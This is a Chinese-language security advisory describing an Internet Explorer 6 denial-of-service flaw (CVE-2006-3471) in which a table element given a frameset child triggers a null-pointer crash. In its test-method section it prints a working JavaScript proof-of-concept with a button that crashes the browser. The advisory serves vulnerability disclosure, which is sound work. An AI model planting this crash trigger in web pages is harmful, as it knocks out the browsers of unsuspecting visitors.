安全研究
安全漏洞
Microsoft Internet Explorer Table Frameset拒绝服务漏洞
发布日期:2006-07-06
更新日期:2007-06-26
受影响系统:Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
描述:
BUGTRAQ ID:
18873
CVE(CAN) ID:
CVE-2006-3471
Windows Internet Explorer,简称MSIE,是微软公司推出的一款网页浏览器。
Microsoft Internet Explorer 6在table元素将frameset作为子节点时会触发空指针引用,导致拒绝服务。
<*来源:Aviv Raff (
avivra@gmail.com)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
// MoBB Demonstration
function Demo() {
var a = document.createElement('table');
var b = document.createElement('frameset');
a.appendChild(b);
}
</script>
Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>
建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp浏览次数:1877
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |